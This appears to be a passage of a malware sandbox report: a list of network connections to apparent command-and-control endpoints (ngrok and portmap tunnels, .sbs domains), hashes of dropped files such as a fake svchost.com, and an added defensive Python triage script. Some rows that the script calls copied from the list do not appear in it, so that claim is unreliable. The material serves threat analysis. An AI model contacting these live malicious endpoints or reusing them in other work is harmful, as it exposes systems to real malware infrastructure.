DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 tcp
IR 46.167.149.255:40500 udp
US 8.8.8.8:53 255.149.167.46.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
HU 38.180.109.140:20007 tcp
UZ 90.156.167.42:40500 udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 42.167.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
UZ 90.156.163.98:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
RU 178.206.158.183:40500 udp
US 8.8.8.8:53 183.158.206.178.in-addr.arpa udp
CN 106.42.31.65:8088 tcp
FR 176.150.119.15:56001 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
IR 2.180.218.158:40500 udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
NL 91.92.240.41:80 tcp
US 8.8.8.8:53 158.218.180.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 tcp
UZ 213.230.91.87:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 87.91.230.213.in-addr.arpa udp
BG 87.120.126.5:80 87.120.126.5 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 20.83.148.22:80 tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 5.126.120.87.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
MX 189.141.139.39:40500 udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 thizx13vt.top udp
N/A 192.168.100.18:4782 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
HU 38.180.109.140:20007 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
IR 2.181.218.207:40500 udp
US 8.8.8.8:53 property-imper.sbs udp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 8.8.8.8:53 207.218.181.2.in-addr.arpa udp
US 8.8.8.8:53 blade-govern.sbs udp
US 172.67.153.209:443 blade-govern.sbs tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 story-tense-faz.sbs udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 209.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 leg-sate-boat.sbs udp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 disobey-curly.sbs udp
US 172.67.223.140:443 disobey-curly.sbs tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 motion-treesz.sbs udp
US 172.67.141.76:443 motion-treesz.sbs tcp
US 8.8.8.8:53 powerful-avoids.sbs udp
US 172.67.187.4:443 powerful-avoids.sbs tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 140.223.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 64.190.113.79:443 tcp
IR 46.248.34.12:40500 tcp
IR 2.179.117.33:40500 udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
FR 176.150.119.15:56001 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
NL 91.92.240.41:80 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
IR 195.181.23.242:40500 udp
US 8.8.8.8:53 242.23.181.195.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:15174 0.tcp.eu.ngrok.io tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
HU 38.180.109.140:20007 tcp
SY 5.134.251.133:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 133.251.134.5.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
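The connection list above is a flattened table: each row is a country code (or "N/A" where the sandbox could not geolocate the address, i.e. private and multicast ranges), a destination ip:port, an optional hostname, and the transport. Rows to 8.8.8.8:53 are the resolver queries the sample made, and the in-addr.arpa names among them are reverse lookups of peers that were already contacted, so they add nothing as indicators. Pulling the actual endpoints out of several hundred such rows by hand is error-prone; the script below is an added example, not part of the original report, that parses rows in this shape, separates resolver queries from real connections, and surfaces the two things a triage analyst wants first: destinations in private or multicast space, and destinations on ports that are neither web nor DNS. The sample input is a handful of rows copied from the list above; the "common" port set and the regex are the example's own assumptions.

```python
"""Triage the flattened network-connection list of a sandbox report.

Added example, not part of the original report. Each row has the shape
"<country> <ip>:<port> [<hostname>] <proto>"; the country "N/A" marks
addresses the sandbox could not geolocate (private ranges, multicast).
"""
import ipaddress
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^(?P<cc>[A-Z]{2}|N/A)\s+(?P<ip>[0-9.]+):(?P<port>\d+)\s+"
    r"(?:(?P<host>\S+)\s+)?(?P<proto>tcp|udp)$"
)

# Ports treated as ordinary web/DNS traffic (assumption of this example).
COMMON_PORTS = {53, 80, 443, 8080}

# Constructed sample: a few rows copied from the report's network list.
SAMPLE = """\
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
UZ 94.141.68.56:40500 udp
KZ 95.58.91.70:40500 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 52.57.120.10:15174 0.tcp.eu.ngrok.io tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 delaylacedmn.site udp
US 8.8.8.8:53 famikyjdiag.site udp
RU 185.215.113.66:80 twizthash.net tcp
"""


def parse(text):
    """Yield one dict per well-formed row; malformed rows are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            yield row


def triage(text):
    """Split the rows into resolver queries and real endpoints.

    Returns a dict with:
      queried   - hostnames sent to the resolver (reverse lookups dropped)
      endpoints - Counter of (ip, port, proto) for non-DNS connections
      private   - endpoints in private or multicast space
      odd_ports - public endpoints on ports outside COMMON_PORTS
    """
    queried, endpoints = set(), Counter()
    private, odd_ports = set(), set()
    for row in parse(text):
        if row["proto"] == "udp" and row["port"] == 53:
            host = row["host"] or ""
            if host and not host.endswith(".in-addr.arpa"):
                queried.add(host)
            continue
        key = (row["ip"], row["port"], row["proto"])
        endpoints[key] += 1
        ip = ipaddress.ip_address(row["ip"])
        if ip.is_private or ip.is_multicast:
            private.add(key)
        elif row["port"] not in COMMON_PORTS:
            odd_ports.add(key)
    return {"queried": queried, "endpoints": endpoints,
            "private": private, "odd_ports": odd_ports}


def port_histogram(text):
    """Count distinct peers per destination port.

    One port shared by many unrelated addresses (40500 in the list above)
    points at a peer-to-peer or bot-to-bot protocol rather than one server,
    so the port itself becomes the indicator instead of any single address.
    """
    peers = defaultdict(set)
    for ip, port, _proto in triage(text)["endpoints"]:
        peers[port].add(ip)
    return {port: len(ips) for port, ips in peers.items()}


if __name__ == "__main__":
    result = triage(SAMPLE)
    print("queried:", sorted(result["queried"]))
    print("private:", sorted(result["private"]))
    print("odd ports:", sorted(result["odd_ports"]))
    print("peers per port:", port_histogram(SAMPLE))
```

Run it over the full list by pasting the rows into SAMPLE or reading them from a file; the 192.168.100.18:4782 rows then stand out as a connection attempt to a host on the sandbox's own subnet, and the port histogram shows which ports recur across dozens of unrelated address blocks.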

Files

memory/1808-0-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

memory/1808-1-0x0000000000210000-0x0000000000218000-memory.dmp

memory/1808-2-0x0000000004AB0000-0x0000000004B4C000-memory.dmp

memory/1808-3-0x0000000074F80000-0x0000000075731000-memory.dmp

memory/1808-4-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

memory/1808-5-0x0000000074F80000-0x0000000075731000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe

MD5 2cca969570717a0af4f2531eb69cc7c9
SHA1 692243584cca03a41bab00ae6113e6e7a3d14863
SHA256 a9971d2f3b8c1611723938a3ea6578c27f31049d3297e607cf0ee6927a4a26c7
SHA512 3a2257abdadb2ef34a8171a3c3965b8e6bba955dcda0ca837a635736da0f17795e71ff93d8f4421a51ac9778d10dce1f3c28a62149d05ccf07ae75934fff5670

C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe

MD5 2cbd6ad183914a0c554f0739069e77d7
SHA1 7bf35f2afca666078db35ca95130beb2e3782212
SHA256 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f
SHA512 ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

MD5 ac3a5f7be8cd13a863b50ab5fe00b71c
SHA1 eee417cd92e263b84dd3b5dcc2b4b463fe6e84d9
SHA256 8f5e89298e3dc2e22d47515900c37cca4ee121c5ba06a6d962d40ad6e1a595da
SHA512 c8bbe791373dad681f0ac9f5ab538119bde685d4f901f5db085c73163fc2e868972b2de60e72ccd44f745f1fd88fcde2e27f32302d8cbd3c1f43e6e657c79fba

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.inf

MD5 ad8982eaa02c7ad4d7cdcbc248caa941
SHA1 4ccd8e038d73a5361d754c7598ed238fc040d16b
SHA256 d63c35e9b43eb0f28ffc28f61c9c9a306da9c9de3386770a7eb19faa44dbfc00
SHA512 5c805d78bafff06c36b5df6286709ddf2d36808280f92e62dc4c285edd9176195a764d5cf0bb000da53ca8bbf66ddd61d852e4259e3113f6529e2d7bdbdd6e28

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup.dll

MD5 984cad22fa542a08c5d22941b888d8dc
SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
SHA512 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup32.dll

MD5 a5412a144f63d639b47fcc1ba68cb029
SHA1 81bd5f1c99b22c0266f3f59959dfb4ea023be47e
SHA256 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6
SHA512 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

MD5 29de30606fa3cd9024d87066016d0351
SHA1 32af15b435a5f26655947612fe30da89b5a29370
SHA256 56a35f9bcb582449d44a4bed4fa36dcb140f04961f0f1fec1d96385569f72cac
SHA512 6fbe73cddab8a943d1ce060da1a3d26832616aefad76fe3b1dbd71991e4412a591133aee34df6a467a15acce8c587ea1420ca2f0dc4c8c77d54b8712a00a9355

C:\Windows\svchost.com

MD5 ead203cb6aa81e842d32f43fab32c493
SHA1 124b348eb437e838674f5b9de4e98da20c17ef60
SHA256 c6845f33531b0405b1f2b248aa2e9c429bb074fd32589fa55d4429ce2dfc96ef
SHA512 a60434cb1ed67867613951ca4a09c8c3b7ba34ca7d03e16399eb96b771d41f96d7efdcd39f6e35cc1e341f273d3303584c3c981943e3e2d6bc016471f51cfc5d

memory/3048-81-0x0000000000550000-0x0000000000874000-memory.dmp

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe

MD5 892cf4fc5398e07bf652c50ef2aa3b88
SHA1 c399e55756b23938057a0ecae597bd9dbe481866
SHA256 e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781
SHA512 f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167

C:\PROGRA~2\Google\Update\DISABL~1.EXE

MD5 7429ce42ac211cd3aa986faad186cedd
SHA1 b61a57f0f99cfd702be0fbafcb77e9f911223fac
SHA256 d608c05409ac4bd05d8e0702fcf66dfae5f4f38cbae13406842fa5504f4d616f
SHA512 ee4456877d6d881d9904013aabecb9f2daf6fc0ec7a7c9251e77396b66a7f5a577fe8544e64e2bb7464db429db56a3fe47c183a81d40cc869d01be573ab5e4c1

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE

MD5 1e09e65111ab34cb84f7855d3cddc680
SHA1 f9f852104b46d99cc7f57a6f40d5db2090be04c0
SHA256 8f5c7c8e0258a5caa37637b2fa36f3bd87569a97b5c1ecf40dab50e7255fcf9c
SHA512 003176cb9dd7668b1b40e4d60d86d57c1a9ec4d873382aab781b31c8c89f0e388f3d406963f159412e2828d0be9f6daea146a252d8ee47281dda01123c9e7ace

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 ef725bbc6052f8751afb1e3ca0ae58cc
SHA1 d76a87278260f658bb7fa465ceae9fed13b72358
SHA256 4a720462481db2dfdd1213396de56329f4b527f7c8a6de8782f03c86657b3f68
SHA512 5b6de41eb9efb429451d6d55e3ce122f9271dd8bf0c87a9f700061f414d10d01758f6e78f11c6909eb33d10612b7f741425863e7b0d18c6bc3d8032d82eb99c0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

MD5 b08c36ce99a5ed11891ef6fc6d8647e9
SHA1 db95af417857221948eb1882e60f98ab2914bf1d
SHA256 cc9248a177495f45ec70b86c34fc5746c56730af36ace98ac7eb365dbafda674
SHA512 07e62581eace395b0a9699d727761648103180c21155d84ea09140f9e1c9690705c419118545aa67a564334bbde32710225fe3aa92b0b4b4210cb91f0058b1ea

memory/1352-216-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE

MD5 63dc05e27a0b43bf25f151751b481b8c
SHA1 b20321483dac62bce0aa0cef1d193d247747e189
SHA256 7d607fb69c69a72a5bf4305599279f46318312ce1082b6a34ac9100b8c7762ce
SHA512 374d705704d456cc5f9f79b7f465f6ec7c775dc43001c840e9d6efbbdef20926ed1fa97f8a9b1e73161e17f72520b96c05fa58ac86b3945208b405f9166e7ba3

C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE

MD5 86749cd13537a694795be5d87ef7106d
SHA1 538030845680a8be8219618daee29e368dc1e06c
SHA256 8c35dcc975a5c7c687686a3970306452476d17a89787bc5bd3bf21b9de0d36a5
SHA512 7b6ae20515fb6b13701df422cbb0844d26c8a98087b2758427781f0bf11eb9ec5da029096e42960bf99ddd3d4f817db6e29ac172039110df6ea92547d331db4c

C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE

MD5 9597098cfbc45fae685d9480d135ed13
SHA1 84401f03a7942a7e4fcd26e4414b227edd9b0f09
SHA256 45966655baaed42df92cd6d8094b4172c0e7a0320528b59cf63fca7c25d66e9c
SHA512 16afbdffe4b4b2e54b4cc96fe74e49ca367dea50752321ddf334756519812ba8ce147ef5459e421dc42e103bc3456aab1d185588cc86b35fa2315ac86b2a0164

C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE

MD5 9c10a5ec52c145d340df7eafdb69c478
SHA1 57f3d99e41d123ad5f185fc21454367a7285db42
SHA256 ccf37e88447a7afdb0ba4351b8c5606dbb05b984fb133194d71bcc00d7be4e36
SHA512 2704cfd1a708bfca6db7c52467d3abf0b09313db0cdd1ea8e5d48504c8240c4bf24e677f17c5df9e3ac1f6a678e0328e73e951dc4481f35027cb03b2966dc38f

C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE

MD5 97510a7d9bf0811a6ea89fad85a9f3f3
SHA1 2ac0c49b66a92789be65580a38ae9798237711db
SHA256 c48abbc29405559e68cc9f8fc6d218aa317a9d0023839c7846ca509c1f563fea
SHA512 2a93e2a3bd187fdde160f87ef777ccd1d1c398d547b7c869e6b64469b9418ad04d887cdfe94af7407476377bf2d009f576de3935c025b7aefbab26fbcd8f90fb

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

MD5 71685fb1a3701f1e27e48ba3e3ce9530
SHA1 f460a9ecc7e35b4691532bc6c647dbe3973a51ca
SHA256 6600b4938a679ecd93d6149fb3f8fe74c8b347106de55a4853a76ae7a204950e
SHA512 3a7505c3faacf6f3e113570545767757d2db5aa342023a4eea27e49e4d632a0064a957c6b07f950e727dd71b8262b768626521cf1d1fbb195fd36d7db7bf5c5a

C:\PROGRA~2\MOZILL~1\UNINST~1.EXE

MD5 3cfd732cd6a3399c411739a8b75b5ae2
SHA1 242b02177cbec61819c11c35c903a2994e83ae10
SHA256 e90c627265bc799db00828179a5d76717a577086755043ba223a9ac78510a2ff
SHA512 b7b61c5f9dab2c6a4e5157a934db5bb26727418698fa44f05fbb9af38cd93dee0261f3f28700bc5cb21e8947a542c3ee6166375ea262c19d41e84c68b0d0fc72

C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE

MD5 d84f63a0bf5eff0c8c491f69b81d1a36
SHA1 17c7d7ae90e571e99f1b1685872f91c04ee76e85
SHA256 06d363997722b0e3c4787f72ca61cb2a8ad59ea7ba8a9d14eafa8a8a550687a2
SHA512 865aab84cfe40604ffd013d8517a538eb1322b90372d236821c0e39e285a20bdad755ddff8d59d8af47a9b10b6c77947abc9148761e75892c617db8503b0ef6e

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE

MD5 4754ef85cf5992c484e75c0859cd0c12
SHA1 199b550e52f74d5a9932b1210979bc79a9b8f6fd
SHA256 da6de758d909ff5b7fb150a4a6a6b9774951aa2bd7c93966ea8951647386c330
SHA512 22c557807b81aac91c65643abb73f212d13f7c4504b6bb14e82bd9cf91319f2daadafa67425d91fa95f1d39c3700684f928e7d68468cb192c4c0be71b9f9b5ab

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE

MD5 4f197c71bb5b8880da17b80a5b59dd04
SHA1 c3d4b54f218768e268c9114aa9cdaf36a48803cd
SHA256 a1a0bf09839e6175e5508271774c6d94f4eb2130c914ea7666c1ecaf1a6fde47
SHA512 e6104ade74dc18e05be756e2a287b9940cdc98150ddd7c562b61282d57070e1d7272316469f1e1b294d3dfbcf191c2692de0d45a2fae59e73c4c039d80f3e002

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE

MD5 da18586b25e72ff40c0f24da690a2edc
SHA1 27a388f3cdcfa7357f971b5c4411ea5aa1b9e5f5
SHA256 67f6e8f14bcf0e6d570c1f4ac5a1bb80a4e1470b5bad5a7ee85689c476597d8e
SHA512 3512820a9d37b61f77a79b2d4d3f6aec9ef53dbf81071bee16f5dcc8173393a1cd1bffe9f7f39467b72f9c9271a78e42078e68598934188d9df0b887f2edc5ab

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE

MD5 e6aecae25bdec91e9bf8c8b729a45918
SHA1 3097cddcb7d2a7512b8df9f5637d9bb52f6175ed
SHA256 a60e32baf0c481d6b9db3b84c205716fe2e588cb5089c3d0e4e942e453bf086d
SHA512 c9a6add86a2907f21c5049613fd8300800e4a949a943feea9ab36a271596343328bf0856e3d8dc4784b1c8357e01c3702761b8d9a3170ebd279dc4e1f1cacb01

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE

MD5 5d656c152b22ddd4f875306ca928243a
SHA1 177ff847aa898afa1b786077ae87b5ae0c7687c7
SHA256 4d87b0eb331443b473c90650d31b893d00373ff88dcbcb3747f494407799af69
SHA512 d5e50ee909ea06e69fc0d9999c6d142f9154e6f63462312b4e950cf6e26a7d395dbb50c8e2a8c4f4e1cfb7b2c6ae8ad19e3b7c204c20e7557daa1a0deb454160

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE

MD5 c7f7803a2032d0d942340cfebba0a42c
SHA1 578062d0707e753ab58875fb3a52c23e6fe2adf6
SHA256 0f201a8142c5a8adc36d2a177dd8d430eef2b05cff0e4faefb52440e823b54bb
SHA512 48e3e1eb3a33c1b8c20411209d8ed261c00798393f5fdd691d3fa0abed2849d8eb241bedcbeefddfebbec292c7abd254023e25df77c85b46000fe63a7324172b

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE

MD5 5c78384d8eb1f6cb8cb23d515cfe7c98
SHA1 b732ab6c3fbf2ded8a4d6c8962554d119f59082e
SHA256 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564
SHA512 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE

MD5 a5d9eaa7d52bffc494a5f58203c6c1b5
SHA1 97928ba7b61b46a1a77a38445679d040ffca7cc8
SHA256 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48
SHA512 b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe

MD5 5119e350591269f44f732b470024bb7c
SHA1 4ccd48e4c6ba6e162d1520760ee3063e93e2c014
SHA256 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873
SHA512 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE

MD5 27543bab17420af611ccc3029db9465a
SHA1 f0f96fd53f9695737a3fa6145bc5a6ce58227966
SHA256 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c
SHA512 a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE

MD5 11486d1d22eaacf01580e3e650f1da3f
SHA1 a47a721efec08ade8456a6918c3de413a2f8c7a2
SHA256 5e1b1daa9968ca19a58714617b7e691b6b6f34bfacaf0dcf4792c48888b1a5d3
SHA512 5bd54e1c1308e04a769e089ab37bd9236ab97343b486b85a018f2c8ad060503c97e8bc51f911a63f9b96dd734eb7d21e0a5c447951246d972b05fafeef4633da

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE

MD5 eb008f1890fed6dc7d13a25ff9c35724
SHA1 751d3b944f160b1f77c1c8852af25b65ae9d649c
SHA256 a9b7b9155af49d651b092bb1665447059f7a1d0061f88fa320d4f956b9723090
SHA512 9cfe3480f24bf8970ad5773cb9df51d132ee90ada35cbf8ec1222e09a60ae46b2ff4b96862fea19085b1c32f93c47c69f604589fa3f4af17e5d67bef893b6bf1

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe

MD5 6ce350ad38c8f7cbe5dd8fda30d11fa1
SHA1 4f232b8cccd031c25378b4770f85e8038e8655d8
SHA256 06a3bb0bdd2da870bc8dc2c6b760855cea7821273ce59fc0be158149e52915ba
SHA512 4c18a112fec391f443a4ae217ac6d1850e0cfdad4b2d2cbe3f61cb01c0a1400ea6bd5c3ffe0a9978ead50e7f6cfab96ae5090bb9a611f988f1a86ccaa5d4cd4f

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE

MD5 301d7f5daa3b48c83df5f6b35de99982
SHA1 17e68d91f3ec1eabde1451351cc690a1978d2cd4
SHA256 abe398284d90be5e5e78f98654b88664e2e14478f7eb3f55c5fd1c1bcf1bebee
SHA512 4a72a24dec461d116fe8324c651913273ccaa50cb036ccdacb3ae300e417cf4a64aa458869b8d2f3b4c298c59977437d11b241d08b391a481c3226954bba22e4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE

MD5 41b1e87b538616c6020369134cbce857
SHA1 a255c7fef7ba2fc1a7c45d992270d5af023c5f67
SHA256 08465cc139ee50a7497f8c842f74730d3a8f1a73c0b7caca95e9e6d37d3beed3
SHA512 3a354d3577b45f6736203d5a35a2d1d543da2d1e268cefeffe6bdb723ff63c720ceb2838701144f5fec611470d77649846e0fb4770d6439f321f6b819f03e4db

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE

MD5 5e08d87c074f0f8e3a8e8c76c5bf92ee
SHA1 f52a554a5029fb4749842b2213d4196c95d48561
SHA256 5d548c2cc25d542f2061ed9c8e38bd5ca72bddb37dd17654346cae8a19645714
SHA512 dd98d6fa7d943604914b2e3b27e1f21a95f1fe1feb942dd6956e864da658f4fbd9d1d0cf775e79ceaae6a025aafd4e633763389c37034134bd5245969bec383e

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE

MD5 7c73e01bd682dc67ef2fbb679be99866
SHA1 ad3834bd9f95f8bf64eb5be0a610427940407117
SHA256 da333c92fdfd2e8092f5b56686b94f713f8fa27ef8f333e7222259ad1eb08f5d
SHA512 b2f3398e486cde482cb6bea18f4e5312fa2db7382ca25cea17bcba5ab1ff0e891d59328bc567641a9da05caca4d7c61dc102289d46e7135f947ce6155e295711

C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE

MD5 d9a290f7aec8aff3591c189b3cf8610a
SHA1 7558d29fb32018897c25e0ac1c86084116f1956c
SHA256 41bed95cb1101181a97460e2395efebb0594849e6f48b80a2b7c376ddf5ce0ea
SHA512 b55ab687a75c11ba99c64be42ad8471576aa2df10ce1bb61e902e98827e3a38cd922e365751bd485cac089c2bd8bccf939a578da7238506b77fe02a3eb7994c6

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE

MD5 d9186b6dd347f1cf59349b6fc87f0a98
SHA1 6700d12be4bd504c4c2a67e17eea8568416edf93
SHA256 a892284c97c8888a589ea84f88852238b8cd97cc1f4af85b93b5c5264f5c40d4
SHA512 a29cc26028a68b0145cb20ec353a4406ec86962ff8c3630c96e0627639cf76e0ea1723b7b44592ea4f126c4a48d85d92f930294ae97f72ecc95e3a752a475087

C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE

MD5 87bb2253f977fc3576a01e5cbb61f423
SHA1 5129844b3d8af03e8570a3afcdc5816964ed8ba4
SHA256 3fc32edf3f9ab889c2cdf225a446da1e12a7168a7a56165efe5e9744d172d604
SHA512 7cfd38ceb52b986054a68a781e01c3f99e92227f884a4401eb9fbc72f4c140fd32a552b4a102bedf9576e6a0da216bc10ce29241f1418acb39aeb2503cb8d703

C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE

MD5 cdc455fa95578320bd27e0d89a7c9108
SHA1 60cde78a74e4943f349f1999be3b6fc3c19ab268
